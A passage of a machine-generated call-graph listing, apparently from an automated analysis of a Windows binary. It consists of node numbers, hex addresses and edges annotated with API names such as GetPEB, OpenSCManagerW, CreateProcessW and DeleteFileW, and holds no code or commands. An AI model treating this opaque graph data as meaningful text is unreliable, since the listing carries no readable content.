8057->8051 8057->8052 8057->8054 8057->8055 8057->8056 8058 73ae03 GetPEB 8057->8058 8058->8057 8064 7412be 8059->8064 8060 741758 8061 74f88f GetPEB 8060->8061 8062 741756 8061->8062 8062->7877 8063 74f88f GetPEB 8063->8064 8064->8060 8064->8062 8064->8063 8065 743512 2 API calls 8064->8065 8065->8064 8068 73afb9 8066->8068 8069 73aff1 8068->8069 8904 733d8a 8068->8904 8908 745a5c 8068->8908 8069->7877 8072 736d2b 8071->8072 8074 743512 2 API calls 8072->8074 8075 736d76 8072->8075 8912 74a156 8072->8912 8074->8072 8075->7877 8083 74ec1b 8076->8083 8078 74ede9 8079 7368de GetPEB 8078->8079 8081 74ede7 8079->8081 8080 743512 2 API calls 8080->8083 8081->7877 8083->8078 8083->8080 8083->8081 8945 750d5b 8083->8945 8955 74ee11 8083->8955 8959 736d80 8083->8959 8088 740740 8085->8088 8086 74e689 GetPEB CloseServiceHandle 8086->8088 8087 740896 8087->7877 8088->8086 8088->8087 8089 732e96 2 API calls 8088->8089 8090 73eb36 2 API calls 8088->8090 9055 73c67d 8088->9055 8089->8088 8090->8088 8093 73c263 8092->8093 8094 732d9f GetPEB 8093->8094 8095 73c2fe 8094->8095 8095->7877 8097 75074a GetPEB 8096->8097 8098 732c36 8097->8098 8099 732d70 8098->8099 8101 732d6e 8098->8101 8102 73ab66 RtlAllocateHeap GetPEB 8098->8102 8103 735ae2 GetPEB 8098->8103 8104 73e7ce GetPEB 8098->8104 8105 74d37b GetPEB 8098->8105 8106 73ae03 GetPEB 8098->8106 8100 738d95 2 API calls 8099->8100 8100->8101 8101->7877 8102->8098 8103->8098 8104->8098 8105->8098 8106->8098 8110 73ff04 8107->8110 8108 735ae2 GetPEB 8108->8110 8109 73ffeb 8109->7877 8110->8108 8110->8109 8117 73b981 8111->8117 8112 73b9dc 8114 744eff GetPEB 8112->8114 8113 743512 2 API calls 8113->8117 8115 73b9da 8114->8115 8115->7877 8117->8112 8117->8113 8117->8115 9059 7411fc 8117->9059 8119 743512 2 API calls 8118->8119 8120 73f4a9 8119->8120 8120->7877 8126 73436c 8121->8126 8122 73ab66 2 API calls 8122->8126 8124 73e7ce GetPEB 8124->8126 8126->8122 8126->8124 8127 7404b8 4 API calls 8126->8127 8128 738d95 2 API calls 8126->8128 8129 7343a0 8126->8129 8130 73ae03 GetPEB 8126->8130 8132 7344f5 8126->8132 9067 7344fa 8126->9067 9074 7441a7 8126->9074 8127->8126 8128->8126 8131 744fa8 GetPEB 8129->8131 8130->8126 8133 7343b8 8131->8133 8132->8132 9063 735b6b 8133->9063 8137 735d87 8136->8137 8164 732d9f 8137->8164 8141 74e968 8140->8141 8142 732d9f GetPEB 8141->8142 8143 74e9d0 CreateFileW 8142->8143 8143->7916 8145 73ab80 8144->8145 8194 743512 8145->8194 8147 73ac0f 8147->7916 8147->8147 8149 73e7f3 8148->8149 8206 73c1dc 8149->8206 8153 73ae16 8152->8153 8209 7368de 8153->8209 8157 74bbc2 8156->8157 8158 732d9f GetPEB 8157->8158 8159 74bc3d 8158->8159 8159->7916 8161 744dc4 8160->8161 8162 732d9f GetPEB 8161->8162 8163 744e57 CloseHandle 8162->8163 8163->7912 8165 732e5b 8164->8165 8166 732e80 SetFileInformationByHandle 8164->8166 8170 74c761 8165->8170 8166->7916 8168 732e6a 8173 73f2c1 8168->8173 8177 74d374 GetPEB 8170->8177 8172 74c7f2 8172->8168 8174 73f2e7 8173->8174 8175 73f3fd 8174->8175 8178 73c850 8174->8178 8175->8166 8177->8172 8179 73c9c2 8178->8179 8186 7459b7 8179->8186 8182 73ca07 8184 73ca3a 8182->8184 8185 73f2c1 GetPEB 8182->8185 8184->8175 8185->8184 8187 7459ca 8186->8187 8188 732d9f GetPEB 8187->8188 8189 73c9ea 8188->8189 8189->8182 8190 74f949 8189->8190 8191 74f95d 8190->8191 8192 732d9f GetPEB 8191->8192 8193 74f9d5 8192->8193 8193->8182 8199 745bb3 8194->8199 8198 743635 8198->8147 8200 732d9f GetPEB 8199->8200 8201 74361f 8200->8201 8202 737a47 8201->8202 8203 737a66 8202->8203 8204 732d9f GetPEB 8203->8204 8205 737ae7 RtlAllocateHeap 8204->8205 8205->8198 8207 732d9f GetPEB 8206->8207 8208 73c243 8207->8208 8208->7916 8210 7368f4 8209->8210 8211 745bb3 GetPEB 8210->8211 8212 736a03 8211->8212 8215 7440f4 8212->8215 8216 744111 8215->8216 8217 732d9f GetPEB 8216->8217 8218 736a18 8217->8218 8218->7916 8224 74eec0 8219->8224 8220 743512 RtlAllocateHeap GetPEB 8220->8224 8221 7368de GetPEB 8221->8224 8224->8220 8224->8221 8225 74f7f1 8224->8225 8229 74e689 2 API calls 8224->8229 8250 732e96 8224->8250 8254 7395c9 8224->8254 8258 748cd6 8224->8258 8262 74e9e9 8224->8262 8266 735ae2 8224->8266 8225->7930 8229->8224 8231 7401cf 8230->8231 8232 732d9f GetPEB 8231->8232 8233 740244 8232->8233 8233->7930 8235 73eb4e 8234->8235 8236 732d9f GetPEB 8235->8236 8237 73ebe2 OpenSCManagerW 8236->8237 8237->7930 8239 73ea9f 8238->8239 8240 732d9f GetPEB 8239->8240 8241 73eb24 SHGetFolderPathW 8240->8241 8241->7930 8243 74e69f 8242->8243 8244 732d9f GetPEB 8243->8244 8245 74e707 CloseServiceHandle 8244->8245 8245->7930 8247 74bde0 8246->8247 8248 73c1dc GetPEB 8247->8248 8249 74be03 8248->8249 8249->7930 8251 732eb2 8250->8251 8252 732d9f GetPEB 8251->8252 8253 732f22 OpenServiceW 8252->8253 8253->8224 8255 7395f4 8254->8255 8256 732d9f GetPEB 8255->8256 8257 73966f 8256->8257 8257->8224 8259 748cf2 8258->8259 8260 732d9f GetPEB 8259->8260 8261 748d61 8260->8261 8261->8224 8263 74ea28 8262->8263 8264 732d9f GetPEB 8263->8264 8265 74eaa8 8264->8265 8265->8224 8267 732d9f GetPEB 8266->8267 8268 735b62 8267->8268 8268->8224 8270 738db0 8269->8270 8297 751310 8270->8297 8273 751310 GetPEB 8274 739085 8273->8274 8275 751310 GetPEB 8274->8275 8276 7390a1 8275->8276 8301 7408a0 8276->8301 8279 7408a0 GetPEB 8280 7390d4 8279->8280 8305 74e2c5 8280->8305 8282 73910d 8282->7940 8284 74e4b0 8283->8284 8285 73ab66 2 API calls 8284->8285 8286 74e63f 8285->8286 8317 733bf8 8286->8317 8289 73ae03 GetPEB 8290 74e66f 8289->8290 8321 73bab0 8290->8321 8292 74e680 8292->7936 8294 7512c1 8293->8294 8325 7518ed 8294->8325 8298 75132d 8297->8298 8309 733efe 8298->8309 8302 7408b9 8301->8302 8303 732d9f GetPEB 8302->8303 8304 7390bc 8303->8304 8304->8279 8306 74e2d8 8305->8306 8307 732d9f GetPEB 8306->8307 8308 74e34e SHFileOperationW 8307->8308 8308->8282 8310 733f17 8309->8310 8313 733cd1 8310->8313 8314 733cec 8313->8314 8315 732d9f GetPEB 8314->8315 8316 733d79 8315->8316 8316->8273 8318 733c17 8317->8318 8319 73c1dc GetPEB 8318->8319 8320 733c33 8319->8320 8320->8289 8322 73bac3 8321->8322 8323 732d9f GetPEB 8322->8323 8324 73bb40 DeleteFileW 8323->8324 8324->8292 8326 751910 8325->8326 8327 732d9f GetPEB 8326->8327 8328 751306 8327->8328 8328->7940 8330 740efc 8329->8330 8331 732d9f GetPEB 8330->8331 8332 740f65 8331->8332 8332->7953 8334 73c7b4 8333->8334 8335 732d9f GetPEB 8334->8335 8336 73c83b 8335->8336 8336->7953 8338 73703d 8337->8338 8339 732d9f GetPEB 8338->8339 8340 7370b2 8339->8340 8340->7950 8342 74bc6a 8341->8342 8343 732d9f GetPEB 8342->8343 8344 74bcee 8343->8344 8344->7962 8351 73e9ac 8345->8351 8347 73ea4f 8348 7408a0 GetPEB 8347->8348 8350 73ea4d 8348->8350 8349 7512a8 GetPEB 8349->8351 8350->7971 8351->8347 8351->8349 8351->8350 8352 74ba68 8351->8352 8353 74ba7e 8352->8353 8354 732d9f GetPEB 8353->8354 8355 74bade 8354->8355 8355->8351 8357 735fb4 8356->8357 8358 73c1dc GetPEB 8357->8358 8359 735fda 8358->8359 8359->7986 8361 73972e 8360->8361 8362 751310 GetPEB 8361->8362 8363 739995 8362->8363 8370 74679c 8363->8370 8365 7399d1 8366 744dad 2 API calls 8365->8366 8369 7399dc 8365->8369 8367 7399fc 8366->8367 8368 744dad 2 API calls 8367->8368 8368->8369 8369->7983 8371 7467d5 8370->8371 8372 732d9f GetPEB 8371->8372 8373 746847 CreateProcessW 8372->8373 8373->8365 8375 73f4d9 8374->8375 8376 732d9f GetPEB 8375->8376 8377 73f533 8376->8377 8377->7992 8379 732d9f GetPEB 8378->8379 8380 74e3ee 8379->8380 8380->7992 8383 745636 8381->8383 8382 743512 2 API calls 8382->8383 8383->8382 8384 74596d 8383->8384 8386 74596b 8383->8386 8396 73b267 8383->8396 8385 73b267 GetPEB 8384->8385 8385->8386 8386->7992 8389 73bca3 8388->8389 8390 732d9f GetPEB 8389->8390 8391 73bd00 8390->8391 8391->7992 8393 740005 8392->8393 8394 732d9f GetPEB 8393->8394 8395 740094 8394->8395 8395->7994 8397 73b29a 8396->8397 8398 732d9f GetPEB 8397->8398 8399 73b31d 8398->8399 8399->8383 8408 742a6a 8400->8408 8401 742bb6 8401->8003 8403 743512 2 API calls 8403->8408 8404 742bb8 8405 7368de GetPEB 8404->8405 8405->8401 8406 73ab66 2 API calls 8406->8408 8407 73c1dc GetPEB 8407->8408 8408->8401 8408->8403 8408->8404 8408->8406 8408->8407 8409 73ae03 GetPEB 8408->8409 8466 74c9a9 8408->8466 8409->8408 8425 7470f5 8410->8425 8411 743512 RtlAllocateHeap GetPEB 8411->8425 8414 74744f 8417 73bb4b 2 API calls 8414->8417 8416 73ab66 2 API calls 8416->8425 8419 74746e 8417->8419 8418 747144 8420 7368de GetPEB 8418->8420 8483 73f060 8419->8483 8423 747163 8420->8423 8421 73c1dc GetPEB 8421->8425 8423->8003 8425->8411 8425->8414 8425->8416 8425->8418 8425->8421 8425->8423 8427 73ae03 GetPEB 8425->8427 8471 73bb4b 8425->8471 8475 73f545 8425->8475 8479 74fd29 8425->8479 8426 73ae03 GetPEB 8426->8423 8427->8425 8433 731fdb 8428->8433 8430 743512 2 API calls 8430->8433 8433->8430 8434 74fd29 GetPEB 8433->8434 8435 7368de GetPEB 8433->8435 8436 732823 8433->8436 8491 7445cd 8433->8491 8498 74fa99 8433->8498 8502 741831 8433->8502 8518 74ff31 8433->8518 8434->8433 8435->8433 8436->8003 8440 73bd31 8438->8440 8441 743512 2 API calls 8440->8441 8442 73bffa 8440->8442 8445 73c013 8440->8445 8446 74fd29 GetPEB 8440->8446 8549 74cc89 8440->8549 8556 7464f1 8440->8556 8441->8440 8444 7368de GetPEB 8442->8444 8444->8445 8445->8003 8446->8440 8465 747c38 8447->8465 8448 750411 GetPEB 8448->8465 8452 748b27 8453 750411 GetPEB 8452->8453 8455 748881 8453->8455 8455->8003 8456 74886b 8566 750411 8456->8566 8457 7368de GetPEB 8457->8465 8459 73ab66 2 API calls 8459->8465 8462 73ae03 GetPEB 8462->8465 8463 73b6d1 GetPEB 8463->8465 8465->8448 8465->8452 8465->8455 8465->8456 8465->8457 8465->8459 8465->8462 8465->8463 8570 7384b8 8465->8570 8573 750349 8465->8573 8577 7375a5 8465->8577 8581 7400a0 8465->8581 8585 750867 8465->8585 8594 7490db 8465->8594 8598 74bd01 8465->8598 8467 74c9c7 8466->8467 8468 743512 2 API calls 8467->8468 8469 74d2a8 GetPEB 8467->8469 8470 74cc7f 8467->8470 8468->8467 8469->8467 8470->8408 8472 73bb61 8471->8472 8473 743512 2 API calls 8472->8473 8474 73bc13 8473->8474 8474->8425 8476 73f567 8475->8476 8477 73c1dc GetPEB 8476->8477 8478 73f587 8477->8478 8478->8425 8480 74fd44 8479->8480 8487 73c14b 8480->8487 8484 73f07c 8483->8484 8485 73c1dc GetPEB 8484->8485 8486 73f098 8485->8486 8486->8426 8488 73c167 8487->8488 8489 732d9f GetPEB 8488->8489 8490 73c1cc 8489->8490 8490->8425 8492 7445ee 8491->8492 8493 743512 2 API calls 8492->8493 8494 744b24 8492->8494 8495 744b0a 8492->8495 8497 73ad30 GetPEB 8492->8497 8493->8492 8496 7368de GetPEB 8494->8496 8495->8433 8496->8495 8497->8492 8499 74faaf 8498->8499 8500 74fd29 GetPEB 8499->8500 8501 74fb24 8500->8501 8501->8433 8517 741867 8502->8517 8504 74274a 8504->8504 8506 742620 8510 737027 GetPEB 8506->8510 8508 7368de GetPEB 8508->8517 8509 743512 2 API calls 8509->8517 8513 742641 8510->8513 8513->8433 8514 73ab66 RtlAllocateHeap GetPEB 8514->8517 8515 73ae03 GetPEB 8515->8517 8516 740eda GetPEB 8516->8517 8517->8504 8517->8506 8517->8508 8517->8509 8517->8514 8517->8515 8517->8516 8525 74fda3 8517->8525 8529 73e723 8517->8529 8533 73ba16 8517->8533 8537 743b45 8517->8537 8541 74fbcf 8517->8541 8521 74ff5b 8518->8521 8519 743512 2 API calls 8519->8521 8520 7501b7 8520->8433 8521->8519 8521->8520 8522 74f88f GetPEB 8521->8522 8523 75019f 8521->8523 8522->8521 8545 74f88f 8523->8545 8526 74fdc2 8525->8526 8527 732d9f GetPEB 8526->8527 8528 74fe4a 8527->8528 8528->8517 8530 73e739 8529->8530 8531 732d9f GetPEB 8530->8531 8532 73e7c2 8531->8532 8532->8517 8534 73ba38 8533->8534 8535 732d9f GetPEB 8534->8535 8536 73ba9c 8535->8536 8536->8517 8538 743b7a 8537->8538 8539 732d9f GetPEB 8538->8539 8540 743bff 8539->8540 8540->8517 8542 74fbf9 8541->8542 8543 732d9f GetPEB 8542->8543 8544 74fc7d 8543->8544 8544->8517 8546 74f8ab 8545->8546 8547 74fd29 GetPEB 8546->8547 8548 74f93a 8547->8548 8548->8520 8551 74cca8 8549->8551 8550 73b335 GetPEB 8550->8551 8551->8550 8552 74d19b 8551->8552 8553 743512 2 API calls 8551->8553 8555 74d187 8551->8555 8554 7368de GetPEB 8552->8554 8553->8551 8554->8555 8555->8440 8557 74650a 8556->8557 8558 74674a 8557->8558 8559 741831 2 API calls 8557->8559 8561 746748 8557->8561 8562 74d6c0 8558->8562 8559->8557 8561->8440 8563 74d6ef 8562->8563 8564 732d9f GetPEB 8563->8564 8565 74d753 8564->8565 8565->8561 8567 750427 8566->8567 8568 732d9f GetPEB 8567->8568 8569 7504d3 8568->8569 8569->8455 8602 73cf26 8570->8602 8574 750374 8573->8574 8575 732d9f GetPEB 8574->8575 8576 7503f7 8575->8576 8576->8465 8578 7375c4 8577->8578 8579 732d9f GetPEB 8578->8579 8580 737663 8579->8580 8580->8465 8582 7400d9 8581->8582 8583 732d9f GetPEB 8582->8583 8584 740170 8583->8584 8584->8465 8591 750b8b 8585->8591 8587 750cb5 8588 750cbd 8587->8588 8589 7368de GetPEB 8587->8589 8588->8465 8589->8588 8590 743512 RtlAllocateHeap GetPEB 8590->8591 8591->8587 8591->8590 8592 74fd29 GetPEB 8591->8592 8593 7368de GetPEB 8591->8593 8606 73840b 8591->8606 8592->8591 8593->8591 8595 7490fd 8594->8595 8596 732d9f GetPEB 8595->8596 8597 749176 8596->8597 8597->8465 8599 74bd24 8598->8599 8600 732d9f GetPEB 8599->8600 8601 74bd9e 8600->8601 8601->8465 8603 73cf4c 8602->8603 8604 732d9f GetPEB 8603->8604 8605 7385a6 8604->8605 8605->8465 8607 73842d 8606->8607 8608 732d9f GetPEB 8607->8608 8609 7384a4 8608->8609 8609->8591 8611 732d9f GetPEB 8610->8611 8612 73b247 8611->8612 8613 7385b6 8612->8613 8614 7385cf 8613->8614 8615 732d9f GetPEB 8614->8615 8616 738641 8615->8616 8616->7877 8618 744fbe 8617->8618 8619 732d9f GetPEB 8618->8619 8620 745035 8619->8620 8620->8019 8632 73f58f 8621->8632 8625 7519b4 8624->8625 8655 743c1b 8625->8655 8630 744dad 2 API calls 8631 751b49 8630->8631 8631->8019 8637 73f5ba 8632->8637 8635 73f866 8636 744dad 2 API calls 8635->8636 8638 73c78b 8636->8638 8637->8635 8637->8638 8641 750cf5 8637->8641 8644 74e3f7 8637->8644 8648 750296 8637->8648 8652 733c3b 8637->8652 8638->8019 8642 75074a GetPEB 8641->8642 8643 750d40 8642->8643 8643->8637 8645 74e40d 8644->8645 8646 732d9f GetPEB 8645->8646 8647 74e48a 8646->8647 8647->8637 8649 7502af 8648->8649 8650 732d9f GetPEB 8649->8650 8651 75033b 8650->8651 8651->8637 8653 732d9f GetPEB 8652->8653 8654 733cc3 8653->8654 8654->8637 8656 732d9f GetPEB 8655->8656 8657 743caa 8656->8657 8657->8631 8658 741785 8657->8658 8659 7417a6 8658->8659 8660 732d9f GetPEB 8659->8660 8661 74181e 8660->8661 8661->8630 8668 736bb0 8662->8668 8663 736c1e 8663->8029 8664 7368de GetPEB 8664->8668 8665 735e0b GetPEB 8665->8668 8667 744dad 2 API calls 8667->8668 8668->8663 8668->8664 8668->8665 8668->8667 8762 73f88a 8668->8762 8674 745318 8669->8674 8670 745410 8671 73f88a GetPEB 8670->8671 8673 74540e 8671->8673 8673->8029 8674->8670 8674->8673 8770 744eff 8674->8770 8774 748d71 8674->8774 8782 74e713 8674->8782 8683 74aad1 8677->8683 8678 73ea7b 2 API calls 8678->8683 8679 74acc8 8679->8029 8680 7512a8 GetPEB 8680->8683 8681 73ab66 RtlAllocateHeap GetPEB 8681->8683 8682 744fa8 GetPEB 8682->8683 8683->8678 8683->8679 8683->8680 8683->8681 8683->8682 8685 739700 3 API calls 8683->8685 8686 73e7ce GetPEB 8683->8686 8687 73ae03 GetPEB 8683->8687 8795 738650 8683->8795 8799 74c38f 8683->8799 8685->8683 8686->8683 8687->8683 8810 748fd2 8689->8810 8691 7368de GetPEB 8692 73537f 8691->8692 8692->8691 8693 73579e 8692->8693 8695 739700 3 API calls 8692->8695 8697 74ba68 GetPEB 8692->8697 8698 73579c 8692->8698 8700 7512a8 GetPEB 8692->8700 8701 73ae03 GetPEB 8692->8701 8702 73ea7b 2 API calls 8692->8702 8703 744fa8 GetPEB 8692->8703 8705 74c9a9 2 API calls 8692->8705 8706 738650 GetPEB 8692->8706 8707 73ab66 RtlAllocateHeap GetPEB 8692->8707 8708 73e7ce GetPEB 8692->8708 8709 74c38f 3 API calls 8692->8709 8813 735eb5 8692->8813 8817 73777b 8692->8817 8823 74d37b 8692->8823 8699 744dad 2 API calls 8693->8699 8695->8692 8697->8692 8698->8029 8699->8698 8700->8692 8701->8692 8702->8692 8703->8692 8705->8692 8706->8692 8707->8692 8708->8692 8709->8692 8723 7338b0 8710->8723 8711 733b5f 8713 739700 3 API calls 8711->8713 8712 733b32 8712->8029 8715 733b9c 8713->8715 8714 733b37 8716 744dad 2 API calls 8714->8716 8715->8712 8718 744dad 2 API calls 8715->8718 8716->8712 8717 73b186 GetPEB 8717->8723 8718->8714 8722 7512a8 GetPEB 8722->8723 8723->8711 8723->8712 8723->8714 8723->8717 8723->8722 8724 744dad CloseHandle GetPEB 8723->8724 8725 744fa8 GetPEB 8723->8725 8726 738650 GetPEB 8723->8726 8727 73ab66 2 API calls 8723->8727 8728 73e7ce GetPEB 8723->8728 8729 73ae03 GetPEB 8723->8729 8730 74c38f 3 API calls 8723->8730 8827 74363d 8723->8827 8837 739685 8723->8837 8840 73b41a 8723->8840 8724->8723 8725->8723 8726->8723 8727->8723 8728->8723 8729->8723 8730->8723 8737 738192 8731->8737 8732 73ea7b 2 API calls 8732->8737 8733 738397 8733->8029 8734 7512a8 GetPEB 8734->8737 8735 73ab66 RtlAllocateHeap GetPEB 8735->8737 8736 744fa8 GetPEB 8736->8737 8737->8732 8737->8733 8737->8734 8737->8735 8737->8736 8738 738650 GetPEB 8737->8738 8739 739700 3 API calls 8737->8739 8740 73e7ce GetPEB 8737->8740 8741 73ae03 GetPEB 8737->8741 8742 74c38f 3 API calls 8737->8742 8738->8737 8739->8737 8740->8737 8741->8737 8742->8737 8749 740c1d 8743->8749 8744 740d15 8745 73f88a GetPEB 8744->8745 8747 740d13 8745->8747 8746 748d71 GetPEB 8746->8749 8747->8029 8748 744eff GetPEB 8748->8749 8749->8744 8749->8746 8749->8747 8749->8748 8750 74e713 GetPEB 8749->8750 8750->8749 8760 738c4b 8751->8760 8752 739700 3 API calls 8752->8760 8753 7512a8 GetPEB 8753->8760 8754 738d8a 8754->8029 8755 744fa8 GetPEB 8755->8760 8756 738650 GetPEB 8756->8760 8757 73ab66 2 API calls 8757->8760 8758 73e7ce GetPEB 8758->8760 8759 73ae03 GetPEB 8759->8760 8760->8752 8760->8753 8760->8754 8760->8755 8760->8756 8760->8757 8760->8758 8760->8759 8761 74c38f 3 API calls 8760->8761 8761->8760 8763 73f89d 8762->8763 8766 735961 8763->8766 8767 73597e 8766->8767 8768 732d9f GetPEB 8767->8768 8769 7359f7 8768->8769 8769->8668 8771 744f24 8770->8771 8772 732d9f GetPEB 8771->8772 8773 744f95 8772->8773 8773->8674 8775 748d8c 8774->8775 8776 748fc8 8775->8776 8787 73b0da 8775->8787 8776->8674 8779 74fd29 GetPEB 8780 748f83 8779->8780 8780->8776 8781 74fd29 GetPEB 8780->8781 8781->8780 8785 74e72b 8782->8785 8783 74e875 8783->8674 8784 74f949 GetPEB 8784->8785 8785->8783 8785->8784 8791 74d20a 8785->8791 8788 73b0f7 8787->8788 8789 732d9f GetPEB 8788->8789 8790 73b172 8789->8790 8790->8776 8790->8779 8792 74d220 8791->8792 8793 732d9f GetPEB 8792->8793 8794 74d29a 8793->8794 8794->8785 8796 738664 8795->8796 8797 735ae2 GetPEB 8796->8797 8798 738710 8797->8798 8798->8683 8803 74c3a8 8799->8803 8800 74c64b 8802 744dad 2 API calls 8800->8802 8801 74c649 8801->8683 8802->8801 8803->8800 8803->8801 8805 74e938 2 API calls 8803->8805 8806 73eeb8 8803->8806 8805->8803 8807 73eed9 8806->8807 8808 732d9f GetPEB 8807->8808 8809 73ef5a 8808->8809 8809->8803 8811 732d9f GetPEB 8810->8811 8812 74903c 8811->8812 8812->8692 8814 735ee9 8813->8814 8815 732d9f GetPEB 8814->8815 8816 735f68 8815->8816 8816->8692 8818 7377a8 8817->8818 8819 737a1d 8818->8819 8821 737a1b 8818->8821 8822 743512 2 API calls 8818->8822 8820 74f88f GetPEB 8819->8820 8820->8821 8821->8692 8822->8818 8824 74d3a0 8823->8824 8825 73c1dc GetPEB 8824->8825 8826 74d3c0 8825->8826 8826->8692 8828 74367d 8827->8828 8829 751310 GetPEB 8828->8829 8830 743b1e 8828->8830 8833 73ab66 2 API calls 8828->8833 8834 743b1c 8828->8834 8836 73ae03 GetPEB 8828->8836 8848 745b0e 8828->8848 8852 74c8bd 8828->8852 8829->8828 8856 736e34 8830->8856 8833->8828 8834->8723 8836->8828 8838 732d9f GetPEB 8837->8838 8839 7396f7 8838->8839 8839->8723 8843 73b43c 8840->8843 8844 739685 GetPEB 8843->8844 8845 73b615 8843->8845 8847 73b62e 8843->8847 8860 7513b1 8843->8860 8864 74fb2b 8843->8864 8844->8843 8846 744dad 2 API calls 8845->8846 8846->8847 8847->8723 8849 745b28 8848->8849 8850 732d9f GetPEB 8849->8850 8851 745ba3 8850->8851 8851->8828 8853 74c8fa 8852->8853 8854 732d9f GetPEB 8853->8854 8855 74c986 8854->8855 8855->8828 8857 736e4a 8856->8857 8858 732d9f GetPEB 8857->8858 8859 736ecb 8858->8859 8859->8834 8861 7513db 8860->8861 8862 732d9f GetPEB 8861->8862 8863 751455 8862->8863 8863->8843 8865 74fb44 8864->8865 8866 732d9f GetPEB 8865->8866 8867 74fbc1 8866->8867 8867->8843 8869 7387b5 8868->8869 8870 732d9f GetPEB 8869->8870 8871 73882f 8870->8871 8871->8035 8873 74c2fa 8872->8873 8874 732d9f GetPEB 8873->8874 8875 74c375 8874->8875 8875->8035 8877 737b0e 8876->8877 8878 732d9f GetPEB 8877->8878 8879 737b76 8878->8879 8879->8042 8881 731973 8880->8881 8882 733bf8 GetPEB 8881->8882 8884 731f7e 8881->8884 8886 73ae03 GetPEB 8881->8886 8887 731f7c 8881->8887 8888 73ab66 RtlAllocateHeap GetPEB 8881->8888 8890 73e7ce GetPEB 8881->8890 8891 731950 2 API calls 8881->8891 8892 74f7fc 8881->8892 8896 74baea 8881->8896 8882->8881 8900 748c35 8884->8900 8886->8881 8887->8052 8888->8881 8890->8881 8891->8881 8893 74f812 8892->8893 8894 732d9f GetPEB 8893->8894 8895 74f881 8894->8895 8895->8881 8897 74bb04 8896->8897 8898 732d9f GetPEB 8897->8898 8899 74bba3 8898->8899 8899->8881 8901 748c4e 8900->8901 8902 732d9f GetPEB 8901->8902 8903 748ccb 8902->8903 8903->8887 8905 733da3 8904->8905 8906 732d9f GetPEB 8905->8906 8907 733e1f 8906->8907 8907->8068 8909 745a75 8908->8909 8910 732d9f GetPEB 8909->8910 8911 745b03 8910->8911 8911->8068 8914 74a17e 8912->8914 8913 74a3cc 8915 73bb4b 2 API calls 8913->8915 8914->8913 8916 74a3ca 8914->8916 8924 743f73 8914->8924 8917 74a3e2 8915->8917 8916->8072 8928 73f154 8917->8928 8923 73ae03 GetPEB 8923->8916 8925 743f89 8924->8925 8926 732d9f GetPEB 8925->8926 8927 744007 8926->8927 8927->8914 8937 735c03 8928->8937 8930 73f2b6 8933 74d1c1 8930->8933 8934 74d1e5 8933->8934 8935 73c1dc GetPEB 8934->8935 8936 74a409 8935->8936 8936->8923 8938 735c1d 8937->8938 8939 732d9f GetPEB 8938->8939 8940 735c8b 8939->8940 8940->8930 8941 73884a 8940->8941 8942 738877 8941->8942 8943 732d9f GetPEB 8942->8943 8944 7388de 8943->8944 8944->8930 8950 7510a9 8945->8950 8946 73ab66 2 API calls 8946->8950 8947 743512 2 API calls 8947->8950 8948 74bdb5 GetPEB 8948->8950 8949 751287 8949->8083 8950->8946 8950->8947 8950->8948 8950->8949 8951 75126e 8950->8951 8953 73ae03 GetPEB 8950->8953 8963 74eae6 8950->8963 8954 7368de GetPEB 8951->8954 8953->8950 8954->8949 8956 74ee25 8955->8956 8967 740d33 8956->8967 8960 736e2f 8959->8960 8962 736e11 8959->8962 8960->8083 8961 7368de GetPEB 8961->8962 8962->8960 8962->8961 8964 74eb05 8963->8964 8965 743512 2 API calls 8964->8965 8966 74ebb1 8965->8966 8966->8950 8966->8966 8973 740d4d 8967->8973 8970 740ead 8972 7368de GetPEB 8970->8972 8974 740eab 8972->8974 8973->8970 8973->8974 8975 743512 2 API calls 8973->8975 8976 74acd3 8973->8976 8986 753672 8973->8986 8991 739a7d 8973->8991 8974->8083 8975->8973 8983 74b1d7 8976->8983 8978 74b1ff 8980 737027 GetPEB 8978->8980 8979 74b38c 8979->8979 8981 74b220 8980->8981 8981->8973 8982 73ab66 RtlAllocateHeap GetPEB 8982->8983 8983->8978 8983->8979 8983->8982 8984 740eda GetPEB 8983->8984 8985 73ae03 GetPEB 8983->8985 9008 74f9e2 8983->9008 8984->8983 8985->8983 9012 74e884 8986->9012 8989 7368de GetPEB 8990 753775 8989->8990 8990->8973 9007 73a69f 8991->9007 8993 744e64 GetPEB 8993->9007 8994 73ab36 8996 737027 GetPEB 8994->8996 8999 73ab34 8996->8999 8999->8973 9000 740eda GetPEB 9000->9007 9002 74e884 GetPEB 9002->9007 9003 73ab66 RtlAllocateHeap GetPEB 9003->9007 9004 73ae03 GetPEB 9004->9007 9005 74fd29 GetPEB 9005->9007 9006 74f9e2 GetPEB 9006->9007 9007->8993 9007->8994 9007->8999 9007->9000 9007->9002 9007->9003 9007->9004 9007->9005 9007->9006 9016 74d76f 9007->9016 9020 735fe2 9007->9020 9024 733e2a 9007->9024 9028 73cfce 9007->9028 9043 73f0a0 9007->9043 9009 74fa0f 9008->9009 9010 732d9f GetPEB 9009->9010 9011 74fa7d 9010->9011 9011->8983 9013 74e897 9012->9013 9014 732d9f GetPEB 9013->9014 9015 74e92c 9014->9015 9015->8989 9017 74d785 9016->9017 9018 732d9f GetPEB 9017->9018 9019 74d7fe 9018->9019 9019->9007 9021 736004 9020->9021 9022 732d9f GetPEB 9021->9022 9023 736070 9022->9023 9023->9007 9025 733e5a 9024->9025 9026 732d9f GetPEB 9025->9026 9027 733ee1 9026->9027 9027->9007 9030 73dd8e 9028->9030 9029 73e107 9032 737027 GetPEB 9029->9032 9030->9029 9031 73e23e 9030->9031 9034 7368de GetPEB 9030->9034 9035 74fbcf GetPEB 9030->9035 9037 743512 2 API calls 9030->9037 9038 73ab66 RtlAllocateHeap GetPEB 9030->9038 9039 740eda GetPEB 9030->9039 9040 73ae03 GetPEB 9030->9040 9041 74ba68 GetPEB 9030->9041 9047 735c98 9030->9047 9051 744016 9030->9051 9031->9031 9036 73e125 9032->9036 9034->9030 9035->9030 9036->9007 9037->9030 9038->9030 9039->9030 9040->9030 9041->9030 9044 73f0bc 9043->9044 9045 732d9f GetPEB 9044->9045 9046 73f13f 9045->9046 9046->9007 9048 735cc3 9047->9048 9049 732d9f GetPEB 9048->9049 9050 735d47 9049->9050 9050->9030 9052 74404d 9051->9052 9053 732d9f GetPEB 9052->9053 9054 7440d3 9053->9054 9054->9030 9056 73c693 9055->9056 9057 732d9f GetPEB 9056->9057 9058 73c6fb 9057->9058 9058->8088 9060 741215 9059->9060 9061 732d9f GetPEB 9060->9061 9062 74128e 9061->9062 9062->8117 9064 735b7e 9063->9064 9065 732d9f GetPEB 9064->9065 9066 7343d9 9065->9066 9066->7900 9070 734522 9067->9070 9068 734704 9087 749045 9068->9087 9070->9068 9072 751310 GetPEB 9070->9072 9073 734702 9070->9073 9083 73ac8c 9070->9083 9072->9070 9073->8126 9081 74448f 